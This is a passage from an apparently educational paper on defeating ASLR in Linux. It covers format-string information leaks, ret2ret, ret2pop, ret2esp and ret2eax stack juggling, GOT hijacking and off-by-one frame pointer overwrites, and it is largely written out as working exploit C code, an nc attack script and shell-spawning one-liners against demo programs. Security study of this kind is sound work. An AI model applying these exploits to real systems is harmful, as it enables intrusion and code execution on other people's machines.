  803. suchavulnerabilitytothestatethatitdivulgesinforma-
  804. tions about the address space. An attacker could pass
  805. a format string, e.g. "%x%x%x", that let the printf
  806. command divulge these informations. You will see that
  807. these informations - in conjunction with buffer over-
  808. flows - can be used to run shellcode as well.
  809. Consider the network daemon divulge again. It
  810. does not only contain a strcpy vulnerability, but also
  811. a sprintf vulnerability. In the last subsection you
  812. have seen how to exploit divulge locally. With the
  813. format string vulnerability it is even possible to exploit
  814. divulge remotely. The idea is to connect divulge
  815. twice: First to receive critical information about the
  816. stack adresses by exploiting the format string vulner-
  817. ability and second to send an injection vector.
  818. If you are familiar with format strings you know that
  819. the string %m$x will print the m − th parameter above
  820. the format string - even if this location has not been
  821. designed to be a parameter. So an attacker can readout
  822. the whole stack above the formatstring.
  823. Usually there are pointers on the stack that point to
  824. other stack locations, e.g. a saved frame pointer. Such
  825. a pointer itself is not constant due to ASLR, but the
  826. difference between the pointer and the beginning of
  827. 9
  828. the stack is. So it is possible to recalculate the bot-
  829. tom of the stack after the difference has been calcu-
  830. lated once. Therefore it is not necessary to read the
  831. /proc/<pid>/stat file again and again and re-
  832. mote exploitation becomes possible.
  833. The first useful pointer in the divulge daemon can
  834. be found at the 20th position above the format string.
  835. This can be determined using gdb or just by several
  836. tries.
  837. > echo "%20\$x" | \
  838. > nc localhost 7776
  839. > bfb16640
  840. A comparison with the beginning of the stack
  841. provides the constant difference to this pointer:
  842. bfb16c90 hex − bfb16640 hex = 650 hex = 1616 dec .
  843. The exploit in figure 15 awaits the address of the
  844. stack’s bottom as parameter and can be reused here.
  845. So an attack works as follows: First it connects to
  846. divulge to receive the pointer, afterwards it com-
  847. putes the beginning of the stack and finally it connects
  848. again to send the malicious string, which can be cal-
  849. culated on exactly the same way like before. So an
  850. automated attack looks as follows:
  851. PHEX=$(echo "%20\$x" \
  852. |nc localhost 7776 \
  853. |awk ’{print toupper($2)}’)
  854. PDEC=$(echo -e \
  855. "ibase=16;$PHEX" | bc)
  856. STACK=$(($PDEC + 1616))
  857. ./divexploit $STACK \
  858. | nc localhost 7776
  859. 8 Stack juggling methods
  860. This section grabs the creative ideas of Izik Kotler to
  861. bypass ASLR. He calls them ”stack juggling meth-
  862. ods”. These juggling methods base on ”a certain
  863. stack layout, a certain program flow or certain regis-
  864. ter changes. Due to the nature of these factors, they
  865. might not fit to every situation.” (cf. [Kot05b])
  866. 8.1 ret2ret
  867. The problem with ASLR is that it is useless to over-
  868. write the return address with a fixed address. The idea
  869. of ret2ret is to return to an already existing pointer that
  870. points into the shellcode. Already existing pointers
  871. must contain valid stack addresses to work. These valid
  872. stack addresses are potential pointers to the shellcode.
  873. The attacker does not know anything about the stack
  874. addresses, but that does not matter, because he over-
  875. writes the instruction pointer by the content of such a
  876. potential shellcode pointer.
  877. Figure 16: ret2ret illustration
  878. That sounds easy in theory. But there is a big prac-
  879. tical problem: How to use such a pointer as return ad-
  880. dress? Tillnowtheonlywaytomanipulatetheprogram
  881. flow was to overwrite the return instruction pointer di-
  882. rectly. But it is not possible to copy something, e.g.
  883. the potential shellcode pointer, to this location. There-
  884. fore another way is used to get the potential shellcode
  885. pointer into the EIP register: return to return to return
  886. to ... to the pointer (see figure 16).
  887. That means it is possible to move hand over hand
  888. straight to the shellcode pointer using several ret
  889. commands. To understand the chain of returns you
  890. have to recall what a return does: A return means
  891. pop eip, i.e. the content of the location where the
  892. ESP points to is written to the EIP. Usually this con-
  893. tent is the RIP, when ret is called. Furthermore the
  894. ESP jumps one location upwards (the stack shrinks).
  895. Imagine the RIP location contains a pointer to a ret
  896. command itself, and the location above as well and so
  897. on. This would end in a chain of returns: ret2ret.
  898. Remember that the addresses of the code segment
  899. are not randomized. A ret command can be found in
  900. the code segment of every program. So it is no prob-
  901. lem to fill the stack with reliable pointers to return com-
  902. mands. Thereturnchainshouldendrightbeforethepo-
  903. tential shellcode pointer, which would be called by the
  904. last ret. So the number of returns is variable, based
  905. on the offset from the return instruction pointer to the
  906. potential shellcode pointer.
  907. 10
  908. Thepotentialshellcodepointermustbeplacedabove
  909. (that means before) the first RIP, i.e. the pointer has to
  910. be older than the vulnerable buffer. But where to find
  911. pointers to newer stack frames? Every string and there-
  912. fore most buffer overflows have to be terminated by a
  913. zero byte. Thus the least significant byte of the poten-
  914. tial shellcode pointer can be overwritten with a zero.
  915. Due to this zero byte the pointer may be smaller than
  916. before and from there on it points to newer stack con-
  917. tents - where the shellcode is placed (see figure 16).
  918. This byte alignment only works on a little endian sys-
  919. tem and a downwards growing stack. Who wants to try
  920. this on Sun SPARC? ;-) (cf. [Kot05a]).
  921. void function ( char∗ s t r ) {
  922. char buffer [256];
  923. strcpy ( buffer , s t r );
  924. }
  925. int main ( int argc , char∗∗ argv ) {
  926. int no = 1;
  927. int∗ ptr = &no ;
  928. function ( argv [ 1 ] ) ;
  929. }
  930. Figure 17: ret2ret.c
  931. As an example behold figure 17. This C program
  932. comes with a strcpy vulnerability and the potential
  933. pointer ptr. What is needed for an exploit is the ad-
  934. dress of a return command. It can be determined by
  935. using gdb as follows:
  936. (gdb) disass main
  937. 0x080483d4 <main +0>: lea ...
  938. ...
  939. 0x0804840f <main+59>: ret
  940. So a possible address to a ret command is
  941. 0804840f hex . Another possible address can be find
  942. out by disass function. Everything else, like
  943. how many ret commands have to placed before the
  944. pointer, can be determined by gdb as well. I think I
  945. do not have to mention all this issues in detail. But I
  946. want to point out, that such an exploit should contain as
  947. much NOP instructions (0x90) as possible to increase
  948. the chance of the potential pointer to hit the shellcode.
  949. You can find an (often) working exploit for
  950. ret2ret in figure 18. Just pass the output of the ex-
  951. ploit to the input of ret2ret:
  952. > ./ret2ret ‘./ret2retExploit‘
  953. sh-3.1$
  954. int main ( void ) {
  955. char ∗buff , ∗ ptr ;
  956. long ∗ adrptr ; int i ;
  957. buff = malloc (280);
  958. ptr = buff ;
  959. adrptr = ( long ∗) ptr ;
  960. for ( i =0; i <280; i +=4)
  961. ∗( adrptr ++) = 0x0804840f ;
  962. for ( i =0; i <260; i ++)
  963. buff [ i ] = 0x90 ;
  964. ptr = buff +
  965. (260− strlen ( shellcode ) ) ;
  966. for ( i =0; i<strlen ( shellcode ); i ++)
  967. ∗( ptr ++) = shellcode [ i ];
  968. buff [280] = ’\0 ’ ;
  969. printf ( ”%s” , buff );
  970. }
  971. Figure 18: ret2retExploit.c
  972. I said it works ”often”, because the address space is
  973. randomized by every instantiation and so there will be
  974. always a remaining risk, that the shellcode pointer do
  975. not lead to its goal (after the byte alignment).
  976. 8.2 ret2pop
  977. The idea of a ret chain has been explained in the
  978. ret2ret section. The ret2pop method picks up this idea.
  979. During the ret2ret attack the goal has been to align a
  980. pointer with the shellcode by overwriting its least sig-
  981. nificant byte. Contrary to this the ret2pop method has
  982. been developed to take advantage of an already per-
  983. fect pointer. The question is how to modify the return
  984. chain in a way that the least significant byte of a perfect
  985. pointer is not been overwritten. The answer is: return
  986. to return to ... to pop to return to the pointer (see figure
  987. 19).
  988. Before I discuss how this method works in detail,
  989. I want to note how to find such a perfect pointer. The
  990. trick is to survey the multiple locations where the shell-
  991. code is stored. After an exploitation attempt the shell-
  992. code is placed twice in the stack: First in the over-
  993. flowed buffer and second still in the argv array. It
  994. is oftentimes possible to find perfect pointers into the
  995. argv array, e.g. when the main input is passed over to
  996. a function. Classic attacks usually try to return into the
  997. overflowed buffer. Since one can find perfect pointers
  998. to the argv array it is worth a try to return into this
  999. area.
  1000. Now assume there is such a perfect pointer to the
  1001. argv area. A ret2ret chain to this pointer would de-
  1002. stroy its perfectness, since the terminating zero byte
  1003. overwrites the least significant byte. So the input must
  1004. 11
  1005. Figure 19: ret2pop illustration
  1006. stop four bytes earlier to overwrite the least signifi-
  1007. cant byte of the location before the pointer. The prob-
  1008. lem is that the location before the pointer is filled up
  1009. with nonsense and it becomes necessary to jump over
  1010. this location. It is possible to skip one location with a
  1011. pop command (see figure 19). But it is needful to use
  1012. a pop ret combination and not an arbitrary single
  1013. pop command, because the shellcode pointer should
  1014. be used as an instruction pointer afterwards.
  1015. There are a lot of possible pop commands in as-
  1016. sembler. In practice you will frequently find pop ebp
  1017. commands followed by a ret command. But the EBP
  1018. register is not of peculiar interest, it is just the pop
  1019. command. The pop command effects the stack to
  1020. shrink and therfore to skip four bytes - here the four
  1021. bytes before the perfect pointer. So the idea is to return
  1022. to such a pop ebp command, skip four bytes and the
  1023. ret command will be executed afterwards, because of
  1024. the usual incrementation of the EIP register. The ex-
  1025. ecution of the last ret command leads to the shell-
  1026. code, since the ESP register points to the perfect argv
  1027. pointer now.
  1028. int function ( int x , char ∗ s t r ) {
  1029. char buf [256];
  1030. strcpy ( buf , s t r );
  1031. return x ;
  1032. }
  1033. int main ( int argc , char ∗∗argv ) {
  1034. function (64 , argv [ 1 ] ) ;
  1035. }
  1036. Figure 20: ret2pop.c
  1037. Consider the C program ret2pop for instance (see
  1038. figure 20). The code contains a strcpy vulnerabil-
  1039. ity in function and a perfect pointer to argv. This
  1040. pointer exists, because an argv argument is directly
  1041. passed to function. The debugger displays where
  1042. exactly you can find this pointer:
  1043. (gdb) print str
  1044. $1 = 0xbf873a85 "AAAA"
  1045. (gdb) x/4x $ebp
  1046. bf8720e8 080483c0 00000040 bf873a85
  1047. Accordingly to the debugger the argv pointer to
  1048. bf873a85 hex is placed very near to the return instruc-
  1049. tion pointer (which currently contains 080483c0 hex ).
  1050. There is no room for a long return chain; the pop ret
  1051. command has to be placed directly into the RIP lo-
  1052. cation. So there is no need for a single ret com-
  1053. mand. Now it becomes clear why I have built in the
  1054. first parameter x of function. Without this dummy
  1055. (64 dec = 40 hex ) there would be even too less room
  1056. to place just one single pop ret command without
  1057. overwriting the argv pointer with a zero byte.
  1058. What is needed next for a successful exploit is an ad-
  1059. dress of a pop ret combination. The easiest way to
  1060. findsuchaninstructionsequenceistousethefollowing
  1061. command:
  1062. > objdump -D ret2pop | grep -B 2 ret
  1063. 8048466: 5b pop %ebx
  1064. 8048467: 5d pop %ebp
  1065. 8048468: c3 ret
  1066. Hence the address of a pop ret sequence is
  1067. 08048467 hex . This address would be the last entry of a
  1068. ret2pop chain. The entries before, the single ret com-
  1069. mands, would contain 08048468 hex for instance. But
  1070. these entries are not needed here as I have mentioned
  1071. above.
  1072. You can find a working exploit in figure 21. Unlike
  1073. the ret2ret exploit there is no remaining risk that it fails,
  1074. because the shellcode pointer has been perfect from the
  1075. very first - it is not manipulatet. Again you can call the
  1076. exploit as follows:
  1077. > ./ret2pop ‘./ret2popExploit‘
  1078. sh-3.1$
  1079. 8.3 ret2esp
  1080. The principle of this method is to interpret hardcoded
  1081. data as instructions. ret2esp takes advantage of the in-
  1082. struction sequence jmp
  1083. * esp. But you cannot find
  1084. jmp
  1085. * esp in a normal binary - this sequence is just
  1086. 12
  1087. #define POPRET 0x08048467
  1088. #define RET 0x08048468
  1089. #define bufsize 264
  1090. #define chainsize 4
  1091. int main ( void ) {
  1092. char ∗buff , ∗ ptr ;
  1093. long ∗ adrptr ;
  1094. int i ;
  1095. buff = malloc ( bufsize );
  1096. for ( i =0; i<bufsize ; i ++)
  1097. buff [ i ] = ’A’ ;
  1098. ptr = buff+bufsize−chainsize ;
  1099. adrptr = ( long ∗) ptr ;
  1100. for ( i=bufsize−chainsize ; i<bufsize ; i +=4)
  1101. if ( i==bufsize −4) ∗( adrptr ++)=POPRET;
  1102. else ∗( adrptr ++)=RET;
  1103. ptr = buff ;
  1104. for ( i =0; i<strlen ( shellcode ); i ++)
  1105. ∗( ptr ++) = shellcode [ i ];
  1106. buff [ bufsize ] = ’\0 ’ ;
  1107. printf ( ”%s” , buff );
  1108. }
  1109. Figure 21: ret2popExploit.c
  1110. not produced by gcc. Before I explain how to find this
  1111. instruction anyhow, I want to show how to utilize it.
  1112. Consider the illustration in figure 22. The position
  1113. of the ESP is predictable during the function epilogue.
  1114. Therefore it is smart to place the shellcode at the posti-
  1115. tion where the ESP will point to during the epilogue.
  1116. Additionally overwriting the instruction pointer by a
  1117. pointer to jmp
  1118. * esp will lead to the exectution of the
  1119. shellcode. The jmp command will proceed the pro-
  1120. gram flow at the address where the ESP points to.
  1121. The position of the ESP after the RIP has been
  1122. loaded is always one location above the RIP. So the
  1123. shellcode has to be placed above the RIPthis time.
  1124. This technique sounds nice, but - as I mentioned be-
  1125. fore - it is impossible to find a jmp
  1126. * esp instruc-
  1127. tion sequence in the assembler dump of binaries. Well,
  1128. one can search the hexadecimal dump of a binary for
  1129. ffe4 hex . This hexadecimal number will be interpreted
  1130. as jmp
  1131. * esp.
  1132. If an attacker can find this number
  1133. hardcoded anywhere in the binary, he can determine
  1134. the corresponding address and overwrite the RIP ac-
  1135. cordingly.
  1136. This seems to be rare adaptive in practice. But the
  1137. chance to find ffe4 hex hardcoded in binaries is in-
  1138. creased by the size of the binary. Let’s take a look at
  1139. the tar binary. /bin/tar has a size of 226K. A sim-
  1140. ple hexdump followed by grep ffe4 results in five
  1141. hits - and the hits seperated by spaces or line feeds are
  1142. not listed.
  1143. Figure 22: ret2esp illustration
  1144. > hexdump tar | grep ffe4
  1145. ffe0 0807 5807 0000 ffe4 0807
  1146. 25ff ffe4 0807 c068 0002 e900
  1147. 9be8 ffe4 31ff c6c0 e105 081c
  1148. 8900 240c 57e8 ffe4 85ff 0fc0
  1149. dbe8 ffe4 80ff e7bd fffd 00ff
  1150. And considering the whole /usr/bin/ directory
  1151. results in over 7000 hits on my machine:
  1152. > hexdump /usr/bin/ * \
  1153. > | grep ffe4 | wc -l
  1154. 7031
  1155. void function ( char∗ s t r ) {
  1156. char buf [256];
  1157. strcpy ( buf , s t r );
  1158. }
  1159. int main ( int argc , char∗∗ argv ) {
  1160. int j = 58623;
  1161. function ( argv [ 1 ] ) ;
  1162. }
  1163. Figure 23: ret2esp.c
  1164. Consider the vulnerable program ret2esp in fig-
  1165. ure 23. The code contains a hardcoded decimal num-
  1166. ber 58623. Note that ffe4 hex becomes 58623 dec be-
  1167. cause of little endian. One can determine the address of
  1168. 58623 and therfore the address of jmp
  1169. * esp as fol-
  1170. lows:
  1171. 13
  1172. (gdb) disass main
  1173. 0x080483e5: movl $0xe4ff,...
  1174. (gdb) x/i 0x080483e8
  1175. 0x080483e8: jmp
  1176. * %esp
  1177. Thus the correct address is 080483e8 hex . The
  1178. offset of three bytes is needed to skip the original
  1179. mov instruction. A working exploit can be found
  1180. in figure 24. It can be applied as usual by typing
  1181. ./ret2esp ‘./ret2espExploit‘.
  1182. int main ( void ) {
  1183. char ∗buff , ∗ ptr ;
  1184. long ∗ adr ptr ;
  1185. int i ;
  1186. buff = malloc (264);
  1187. ptr = buff ;
  1188. adr ptr = ( long ∗) ptr ;
  1189. for ( i =0; i <264+ strlen ( shellcode ); i +=4)
  1190. ∗( adr ptr ++) = 0x080483e8 ;
  1191. ptr = buff +264;
  1192. for ( i =0; i<strlen ( shellcode ); i ++)
  1193. ∗( ptr ++) = shellcode [ i ];
  1194. buff [264+ strlen ( shellcode )] = ’\0 ’ ;
  1195. printf ( ”%s” , buff );
  1196. }
  1197. Figure 24: ret2espExploit.c
  1198. 8.4 ret2eax
  1199. The idea of this approach is to use the information that
  1200. is stored in the accumulator, the EAX register. A func-
  1201. tion that returns a value, stores this value by using EAX.
  1202. Thus a function that returns a string, writes a pointer to
  1203. this string into the accumulator right before the execu-
  1204. tion is continued by the calling function. The calling
  1205. function can use the content of EAX afterwards, e.g. by
  1206. assigning it to a variable.
  1207. The builtin function strcpy is such a function that
  1208. stores a string pointer in the EAX register. Some peo-
  1209. ple don’t know this feature of strcpy, because it is
  1210. hardly used. Usually it is sufficient to copy a string
  1211. into another buffer. But typing the following will work
  1212. as well:
  1213. bufptr = strcpy(buf,str);
  1214. This effects that bufptr points to the same loca-
  1215. tion as buf. After strcpy returns, the accumulator
  1216. always includes a pointer to the buffer - even if this
  1217. pointerisnotassignedtoavariable. Thesameholdsfor
  1218. user defined functions and a lot of other builtin func-
  1219. tions. So the EAX register can be a perfect pointer to
  1220. the shellcode.
  1221. void function ( char∗ s t r ) {
  1222. char buf [256];
  1223. strcpy ( buf , s t r );
  1224. }
  1225. int main ( int argc , char ∗∗argv ) {
  1226. function ( argv [ 1 ] ) ;
  1227. }
  1228. Figure 25: ret2eax.c
  1229. Consider the code of the C program ret2eax
  1230. listed in figure 25. This code contains the obligatory
  1231. strcpy vulnerability, but not much more. It is ex-
  1232. ploitable under ASLR by overwriting the RIP with a
  1233. pointer to the instruction set call
  1234. * %eax (see figure
  1235. 26).
  1236. Figure 26: ret2eax illustration
  1237. Note that this exploitation technique only works, if
  1238. the accumulator is unaltered until the the EAX register
  1239. will be called. This code could not be exploitable, if
  1240. further commands follow to the strcpy call and alter
  1241. the accumulator as well. And it should be clear that
  1242. nearly every command alters the accumulator. So this
  1243. code is just exploitable, because the strcpy call is the
  1244. very last command of function.
  1245. As the exploit is based on the command
  1246. call
  1247. * %eax, it is needful to determine the ad-
  1248. dress of such an instruction sequence. This sequence
  1249. can usually not be found within the own code. But
  1250. one will always find this sequence somewhere in the
  1251. foreign code by using objdump as follows:
  1252. 14
  1253. > objdump -D ret2eax | grep -B 2 "call"
  1254. 804848f: je 80484a3
  1255. 8048491: xor %ebx,%ebx
  1256. 8048493: call
  1257. * %eax
  1258. Thus the address looked for is 08048493 hex .
  1259. You can find an exploit using this address
  1260. in figure 27. It is applicable as usual by
  1261. ./ret2eax ‘./ret2eaxExploit.
  1262. int main ( void ) {
  1263. char ∗buff , ∗ ptr ;
  1264. long ∗ adr ptr ;
  1265. int i ;
  1266. buff = malloc (264);
  1267. ptr = buff ;
  1268. adr ptr = ( long ∗) ptr ;
  1269. for ( i =0; i <264; i +=4)
  1270. ∗( adr ptr ++) = 0x08048493 ;
  1271. ptr = buff ;
  1272. for ( i =0; i<strlen ( shellcode ); i ++)
  1273. ∗( ptr ++) = shellcode [ i ];
  1274. buff [264] = ’\0 ’ ;
  1275. printf ( ”%s” , buff );
  1276. }
  1277. Figure 27: ret2eaxExploit.c
  1278. 9 GOT hijacking
  1279. A common return into libc attack as described in
  1280. [c0n06a] does not work anymore, since ASLR random-
  1281. izestheaddressspace ofthestackaswellas theaddress
  1282. space of the libraries. But the library functions which
  1283. are called within a program have to be resolved any-
  1284. way. Therefore the library functions have an entry in
  1285. two tables: the GOT and the PLT. A way of bypassing
  1286. ASLR is to attack these tables. But first I want to ex-
  1287. plain what these tables exactly are. The ideas of this
  1288. section are based on [c0n06b].
  1289. 9.1 GOT and PLT
  1290. GOT stands for Global Offset Table and PLT for Pro-
  1291. cedure Linking Table. These tables are closely related
  1292. to each other as well as to the dynamic linker and libc.
  1293. They gain in importance as soon as a library function is
  1294. called. Consider the libc function printf and figure
  1295. 28 for instance.
  1296. By this illustration I want to explain what happens if
  1297. a program calls a library function. The principle is a so
  1298. called lazy binding: External symbols are not resolved
  1299. until they are really needed. According to [San06]:
  1300. Figure 28: GOT and PLT
  1301. 1. A library function is called (e.g. printf). Jump
  1302. to its relevant entry of the PLT. This entry points
  1303. to an entry in the GOT.
  1304. 2. Jump to the address that this entry of the GOT
  1305. contains.
  1306. a) If the function is called for the first time this
  1307. address points to the next instruction in the
  1308. PLT, which calls the dynamic linker to re-
  1309. solve the function’s address. How the dy-
  1310. namic linker works in detail will not be dis-
  1311. cussed here. If the function’s address has
  1312. been found somehow it is written to the GOT
  1313. and the function is executed.
  1314. b) Otherwise the GOT already contains the ad-
  1315. dress that points to printf. The function is
  1316. executed immediately. The part of the PLT
  1317. that calls the dynamic linker is no longer
  1318. used.
  1319. 3. The execution of the function has been finished.
  1320. Go on with the execution of the calling function.
  1321. The PLT contains instructions (namely jmp instruc-
  1322. tions) and the GOT contains pointers. So an attack
  1323. should focus on overwriting the entries of the GOT.
  1324. 9.2 ret2got
  1325. Common exploitation techniques of buffer overflows
  1326. overwrite the RIP to manipulate the instruction pointer
  1327. and consequently the program flow. Manipulating the
  1328. GOT is a completely different approach: The GOT en-
  1329. try of a function A will be patched, so that it points to
  1330. another function B. Every time function A is called,
  1331. function B will be executed with the parameters func-
  1332. tion A has been called with. That can be utilised to run
  1333. commands, if function B is e.g. system and the pa-
  1334. rameter of A can be set by user input, to /bin/sh for
  1335. 15
  1336. instance. According to [c0n06b] this technique does
  1337. not only bypass ASLR but also a non-executable stack.
  1338. void anyfunction ( void ) {
  1339. system ( ”someCommand” );
  1340. }
  1341. int main ( int argc , char∗∗ argv ) {
  1342. char∗ ptr ;
  1343. char array [8];
  1344. ptr = array ;
  1345. strcpy ( ptr , argv [ 1 ] ) ;
  1346. printf ( ”Array has %s at %p\n” , ptr , &ptr );
  1347. strcpy ( ptr , argv [ 2 ] ) ;
  1348. printf ( ”Array has %s at %p\n” , ptr , &ptr );
  1349. }
  1350. Figure 29: ret2got.c
  1351. More precisely the GOT entry of a function has to be
  1352. redirected to the dynamic linker call of another func-
  1353. tion. Consider the C program ret2got listed in fig-
  1354. ure29. TheGOTentryofprintfwillberedirectedto
  1355. thedynamiclinkercallthatcorrespondstothesystem
  1356. function. Convenientlyletassumethatsystemisused
  1357. somewhere in the code. anyfunction is not really
  1358. needed as you see - it just exists to have a reference to
  1359. system. Admittedly, this example is very artificial for
  1360. simplicity and to find such a vulnerability in the wild is
  1361. more difficult.
  1362. An exploit for ret2got works as follows: The first
  1363. strcpy is used to overflow the buffer array and
  1364. thereby to overwrite ptr with the GOT reference of
  1365. printf. Therefore it is possible to overwrite the GOT
  1366. entry of printf during the second strcpy, since
  1367. ptr points to this GOT entry now.
  1368. The first printf instruction is just for interest and
  1369. triggers the dynamic linker to resolve its address. The
  1370. second printf instruction will be interpreted as:
  1371. system("Array has %s at %p\n");
  1372. So printf is a synonym for system and the ar-
  1373. guments remain unchanged. What happens now is that
  1374. system tries to execute the shell command Array. I
  1375. have already explained this behavior in section 5. An
  1376. attacker could create a script called Array that con-
  1377. tains /bin/sh for instance.
  1378. The principle of the exploit becomes clear now. But
  1379. the details are still missing, mainly: How to determine
  1380. the address of printf’s GOT entry and how to de-
  1381. termine the address of system’s dynamic linker call?
  1382. Both can be solved by using gdb. Firstly the GOT en-
  1383. try:
  1384. (gdb) disass main
  1385. <main+70>: call 0x804834c
  1386. (gdb) disass 0x804834c
  1387. <printf@plt+0>: jmp
  1388. * 0x80496ac
  1389. <printf@plt+6>: push $0x10
  1390. <printf@plt+11>: jmp 0x804831c
  1391. Sotherelevantentryforprintfcanbefoundatad-
  1392. dress 080496ac hex within the GOT. If one can manip-
  1393. ulate the content of 080496ac hex , one can manipulate
  1394. the program flow. The jmp instruction is an indirect
  1395. jump (since it is marked with an asterisk); this accords
  1396. with the theoretical explanation I gave about the rela-
  1397. tionship between the GOT and the PLT.
  1398. Determining the address of system’s dynamic
  1399. linker call is easy as well:
  1400. (gdb) disass anyfunction
  1401. 0x08048431: call 0x804832c
  1402. (gdb) disass 0x804832c
  1403. 0x0804832c: jmp
  1404. * 0x80496a4
  1405. 0x08048332: push $0x0
  1406. 0x08048337: jmp 0x0804831c
  1407. (gdb) x/x 0x80496a4
  1408. 0x080496a4: 0x08048332
  1409. So the address where the dynamic linker call of
  1410. system happens is 08048332 hex . This address has
  1411. to be written into the GOT entry of printf, which
  1412. can be found at address 080496ac hex . So 08048332 hex
  1413. has to be written to the location 080496ac hex . Redi-
  1414. recting printf’s GOT entry in this way causes the
  1415. execution of system whenever printf is called.
  1416. Again you can see the correctness of the theoreti-
  1417. cal explanation, since system’s GOT entry contains
  1418. 08048332 hex - this address is exactly the next in-
  1419. struction within system’s PLT entry. (Note: Alter-
  1420. natively one can overwrite printf’s GOT entry by
  1421. 0804832c hex , it would be redirected to 08048332 hex
  1422. anyway.)
  1423. Finally I can show you a working exploit. Fortu-
  1424. nately the exploit is much simpler than the way to it
  1425. has been:
  1426. > ./ret2got ‘perl -e ’print "A"x8; \
  1427. > print "\xac\x96\x04\x08"’‘ \
  1428. > ‘perl -e ’print "\x32\x83\x04\x08"’‘
  1429. Array has ... at 0xbfe01f2c
  1430. sh-3.1 echo oh my got
  1431. oh my got
  1432. Furthermore it is possible to overwrite GOT entries
  1433. by format string vulnerabilities. More about such vul-
  1434. nerabilities and how to exploit them can be found in
  1435. section 11.
  1436. 16
  1437. Figure 30: off-by-one illustration
  1438. 10 Off by one
  1439. Off-by-one describes a possibility to exploit a vulner-
  1440. ability where a buffer can only be overflowed by one
  1441. byte. This is usually the least significant byte of the
  1442. saved frame pointer, since the SFP is placed on the
  1443. stack right before the variables. Furthermore this least
  1444. significant byte is usually overwritten by zero, because
  1445. this is the terminating byte of the users input.
  1446. Frame pointer overwrites have been already de-
  1447. scribed in [klo99] eight years ago. But the princi-
  1448. ple still works under ASLR, since the frame pointer
  1449. is changed relatively to its real position and not ab-
  1450. solutely. Nevertheless ASLR makes it more difficult
  1451. to exploit such a vulnerability, because after the frame
  1452. pointer trick an attacker finds himself in a common
  1453. buffer overflow situation, where he has to define the
  1454. EIP. And to define the EIP needs some of the ASLR
  1455. stack smashing methods to bring in (e.g. a return into
  1456. non-randomized areas, brute forcing, one of the stack
  1457. juggling methods etcetera).
  1458. An off-by-one is based on a typical programming
  1459. mistake where the programmer has miscalculated a
  1460. buffer size just by one byte. Such a vulnerable code
  1461. fragment could look like the following:
  1462. for (i=1; i<=size; i++)
  1463. dst[i] = src[i];
  1464. And this is just one of the most primitive off-by-
  1465. one vulnerabilities. Other off-by-ones could occur
  1466. due to fact that strlen returns the length without
  1467. the zero termination byte, but other functions like
  1468. strncpy expect the length inclusive the zero byte.
  1469. This is confusing and let a programmer often write
  1470. strlen(str)+1 which is again not the best choice
  1471. in every context.
  1472. Understanding the principle of exploiting an off-by-
  1473. one requires profounded knowlegde in function epi-
  1474. logues. So have in mind what happens if a function
  1475. returns to its calling function:
  1476. leave
  1477. = mov %ebp,%esp
  1478. pop %ebp
  1479. ret
  1480. = pop %eip
  1481. Now consider figure 30, which illustrates the frame
  1482. pointer overwrite. The numbering accords to the fol-
  1483. lowing explanation:
  1484. 1. In the initial situation the saved frame pointer
  1485. points to the beginning of the previous frame.
  1486. 2. But due to an off-by-one vulnerability buff is
  1487. overflowed and SFP’s least significant byte is
  1488. overwritten by zero. With a bit of luck the forged
  1489. saved frame pointer FSP points into buff now.
  1490. The probability depends on the size of buff. If
  1491. theFSPdoesnotpointintobuffasecondchance
  1492. is needed. Because of ASLR it is impossible to
  1493. predict an exact position.
  1494. 3. The first instruction of the function epilogue is ex-
  1495. ecuted (mov %ebp,%esp). Both, the EBP and
  1496. the ESP point to the FSP now.
  1497. 4. The second instruction of the epilogue is executed
  1498. (pop %ebp). Now the EBP points to a location
  1499. within buff. The ESP points to the return in-
  1500. struction pointer.
  1501. 5. The third instruction of the epilogue is executed
  1502. (pop %eip). The ESP points to the top of the
  1503. previousframeand theEIPcontainsthenext (still
  1504. correct) instruction of the calling function. The
  1505. 17
  1506. program flow proceeds executing the calling func-
  1507. tion. Only the position of the EBP is forged till
  1508. now.
  1509. 6. Assume the execution of the calling function
  1510. is finished as well and the second function
  1511. epilogue begins. So the next instruction is
  1512. mov %ebp,%esp again. This forges the posi-
  1513. tion of the ESP. The ESP points into buff now.
  1514. 7. The next instruction is pop %ebp. It does not
  1515. matter anymore where the EBP points now, but it
  1516. is important that the ESP still points into buff.
  1517. 8. The last instruction of the second epilogue is
  1518. pop %eip. So the EIP register is overwritten
  1519. with the location where the ESP points to - a loca-
  1520. tion within buff. Therefore it is possible to ex-
  1521. ecute shellcode by placing a well-advised instruc-
  1522. tion pointer at this location. This location cannot
  1523. be determined exactly since ASLR, so it is need-
  1524. ful to fill up big parts of the buffer by the same
  1525. instruction pointer.
  1526. AsIalreadymentionedbeforethisprincipleisnearly
  1527. the same as without ASLR. The difference comes at
  1528. the end: What should be written into the EIP register?
  1529. And this is exactly the ASLR problem that has been
  1530. discussed in the sections before. One possibility is to
  1531. build a ret chain to a jmp
  1532. * esp instruction, that is
  1533. followed by the shellcode. By this technique the ret
  1534. chain covers the need of filling up the buffer with iden-
  1535. tical instruction pointers. In figure 31 you can find a
  1536. program that is vulnerable to this attack.
  1537. void save ( char∗ s t r ) {
  1538. char buff [256];
  1539. strncpy ( buff , str , strlen ( s t r )+1);
  1540. }
  1541. void function ( char∗ s t r ) {
  1542. save ( s t r );
  1543. }
  1544. int main ( int argc , char∗ argv [ ] ) {
  1545. int j = 58623;
  1546. if ( strlen ( argv [1]) > 256)
  1547. printf ( ” Input out of size . ” );
  1548. else
  1549. function ( argv [ 1 ] ) ;
  1550. }
  1551. Figure 31: offbyone.c
  1552. The line that offers an off-by-one is not the
  1553. strncpy command. This line does what the program-
  1554. mer wants: Copying the whole string str inclusive the
  1555. zero byte termination to buff. The vulnerability is the
  1556. if statement in the main method: The programmer
  1557. forgot about the zero byte termination and the behav-
  1558. ior of strlen. A correct statement would check if the
  1559. input is greater than 255. It is up to the reader to write
  1560. an exploit as it is a combination of already discussed
  1561. techniques.
  1562. 11 Overwriting .dtors
  1563. Format string vulnerabilities allow to write into arbi-
  1564. trary locations of the program memory. But it is essen-
  1565. tial to know the target address exactly. Therefore it is
  1566. impossible to overwrite any stack contents (like return
  1567. instruction pointers) since ASLR randomizes these ad-
  1568. dresses. However, there are still two pairs of interest-
  1569. ing locations that are not randomized: The GOT/PLT
  1570. entries and the .dtors/.ctors sections.
  1571. Overwriting the GOT/PLT entries have already been
  1572. discussed in section 9. Now format string vulnerabil-
  1573. ities are used to describe how to overwrite the .dtors
  1574. section. But keep in mind that you are free to combine
  1575. any of these techniques. You can overwrite GOT/PLT
  1576. entries by format string vulnerabilities as well. Or you
  1577. can overwrite the .dtors section by vulnerabilities sim-
  1578. ilar to the one that have been shown in section 9.
  1579. First I will describe how to overwrite arbitrary mem-
